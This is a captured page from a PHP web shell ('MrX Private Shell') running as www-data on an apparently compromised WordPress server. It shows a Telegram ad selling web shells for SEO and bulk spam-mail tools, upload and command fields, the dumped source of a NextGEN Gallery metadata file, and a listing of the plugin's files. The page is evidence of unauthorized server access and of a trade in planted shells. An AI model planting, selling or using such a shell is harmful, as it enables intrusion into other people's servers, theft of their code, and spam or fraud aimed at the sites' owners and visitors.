__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

// look up for the path.
require_once dirname( __DIR__ ) . '/ngg-config.php';

require_once NGGALLERY_ABSPATH . '/lib/meta.php';
require_once NGGALLERY_ABSPATH . '/lib/image.php';

if ( ! is_user_logged_in() ) {
	die( esc_html__( 'Cheatin&#8217; uh?', 'nggallery' ) );
}

if ( ! current_user_can( 'NextGEN Manage gallery' ) ) {
	die( esc_html__( 'Cheatin&#8217; uh?', 'nggallery' ) );
}

if ( ! isset( $_GET['id'] ) ) {
	die( esc_html( __( 'Permission denied', 'nggallery' ) ) );
}

if ( ! isset( $_GET['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['nonce'] ) ), 'ngg_meta_popup' ) ) {
	die( esc_html( __( 'Permission denied', 'nggallery' ) ) );
}

global $wpdb;

$id = (int) $_GET['id'];
// let's get the meta data'.

$meta     = new nggMeta( $id );
$dbdata   = $meta->get_saved_meta();
$exifdata = $meta->get_EXIF();
$iptcdata = $meta->get_IPTC();
$xmpdata  = $meta->get_XMP();
$class    = '';

?>
	<!-- META DATA -->
	<fieldset class="options nggallery">
	<h3><?php esc_html_e( 'Meta Data', 'nggallery' ); ?></h3>
	<?php if ( $dbdata ) { ?>
		<table id="the-list-x" width="100%" cellspacing="3" cellpadding="3">
			<thead>
				<tr>
					<th scope="col"><?php esc_html_e( 'Tag', 'nggallery' ); ?></th>
					<th scope="col"><?php esc_html_e( 'Value', 'nggallery' ); ?></th>
				</tr>
			</thead>
		<?php
		foreach ( $dbdata as $key => $value ) {
			if ( in_array( $key, [ 'created_timestamp', 'timestamp' ] ) && is_numeric( $value ) ) {
				$value = date_i18n( get_option( 'date_format' ) . ' ' . get_option( 'time_format' ), $value );
			}
			if ( is_array( $value ) ) {
				continue;
			}
			$class = ( $class == 'class="alternate"' ) ? '' : 'class="alternate"';
			echo '<tr ' . $class . '>
						<td style="width:230px">' . esc_html( $meta->i18n_name( $key ) ) . '</td>
						<td>' . esc_html( $value ) . '</td>
					</tr>';
		}
		?>
		</table>
		<?php
	} else {
		echo '<strong>' . esc_html__( 'No meta data saved', 'nggallery' ) . '</strong>';}
	?>
	</fieldset>

	<!-- EXIF DATA -->
	<?php if ( $exifdata ) { ?>
	<fieldset class="options nggallery">
	<h3><?php esc_html_e( 'EXIF Data', 'nggallery' ); ?></h3>
		<?php if ( $exifdata ) { ?>
		<table id="the-list-x" width="100%" cellspacing="3" cellpadding="3">
			<thead>
				<tr>
					<th scope="col"><?php esc_html_e( 'Tag', 'nggallery' ); ?></th>
					<th scope="col"><?php esc_html_e( 'Value', 'nggallery' ); ?></th>
				</tr>
			</thead>
			<?php
			foreach ( $exifdata as $key => $value ) {
				if ( in_array( $key, [ 'created_timestamp', 'timestamp' ] ) && is_numeric( $value ) ) {
					$value = date_i18n( get_option( 'date_format' ) . ' ' . get_option( 'time_format' ), $value );
				}
				if ( $key == 'created_date' ) {
					$value = date_i18n( get_option( 'date_format' ), strtotime( $value ) );
				}
				$class = ( $class == 'class="alternate"' ) ? '' : 'class="alternate"';
				echo '<tr ' . $class . '>
						<td style="width:230px">' . esc_html( $meta->i18n_name( $key ) ) . '</td>
						<td>' . esc_html( $value ) . '</td>
					</tr>';
			}
			?>
		</table>
			<?php
		} else {
			echo '<strong>' . esc_html__( 'No exif data', 'nggallery' ) . '</strong>';}
		?>
	</fieldset>
	<?php } ?>

	<!-- IPTC DATA -->
	<?php if ( $iptcdata ) { ?>
	<fieldset class="options nggallery">
	<h3><?php esc_html_e( 'IPTC Data', 'nggallery' ); ?></h3>
		<table id="the-list-x" width="100%" cellspacing="3" cellpadding="3">
			<thead>
				<tr>
					<th scope="col"><?php esc_html_e( 'Tag', 'nggallery' ); ?></th>
					<th scope="col"><?php esc_html_e( 'Value', 'nggallery' ); ?></th>
				</tr>
			</thead>
		<?php
		foreach ( $iptcdata as $key => $value ) {
			if ( in_array( $key, [ 'created_timestamp', 'timestamp' ] ) && is_numeric( $value ) ) {
				$value = date_i18n( get_option( 'date_format' ) . ' ' . get_option( 'time_format' ), $value );
			}
			$class = ( $class == 'class="alternate"' ) ? '' : 'class="alternate"';
			echo '<tr ' . $class . '>
						<td style="width:230px">' . esc_html( $meta->i18n_name( $key ) ) . '</td>
						<td>' . esc_html( $value ) . '</td>
					</tr>';
		}
		?>
		</table>
	</fieldset>
	<?php } ?>

	<!-- XMP DATA -->
	<?php if ( $xmpdata ) { ?>
	<fieldset class="options nggallery">
	<h3><?php esc_html_e( 'XMP Data', 'nggallery' ); ?></h3>
		<table id="the-list-x" width="100%" cellspacing="3" cellpadding="3">
			<thead>
				<tr>
					<th scope="col"><?php esc_html_e( 'Tag', 'nggallery' ); ?></th>
					<th scope="col"><?php esc_html_e( 'Value', 'nggallery' ); ?></th>
				</tr>
			</thead>
		<?php
		foreach ( $xmpdata as $key => $value ) {
			if ( in_array( $key, [ 'created_timestamp', 'timestamp' ] ) && is_numeric( $value ) ) {
				$value = date_i18n( get_option( 'date_format' ) . ' ' . get_option( 'time_format' ), $value );
			}
			$class = ( $class == 'class="alternate"' ) ? '' : 'class="alternate"';
			echo '<tr ' . $class . '>
						<td style="width:230px">' . esc_html( $meta->i18n_name( $key ) ) . '</td>
						<td>' . esc_html( $value ) . '</td>
					</tr>';
		}
		?>
		</table>
	</fieldset>
	<?php } ?>

Filemanager

Name Type Size Permission Actions
css Folder 0755
images Folder 0755
js Folder 0755
templates Folder 0755
admin.php File 14.54 KB 0644
ajax.php File 4.97 KB 0644
album.php File 26.37 KB 0644
edit-thumbnail.php File 6.76 KB 0644
functions.php File 19.93 KB 0644
install.php File 2.99 KB 0644
manage-galleries.php File 19.75 KB 0644
manage-images.php File 27.47 KB 0644
manage-sort.php File 6.75 KB 0644
manage.php File 40.74 KB 0644
media-upload.php File 14.86 KB 0644
overview.php File 14.21 KB 0644
roles.php File 5.79 KB 0644
rotate.php File 3.3 KB 0644
showmeta.php File 4.93 KB 0644
tags.php File 11.41 KB 0644
thumbnails-template.php File 3.5 KB 0644
wpmu.php File 4.26 KB 0644
Filemanager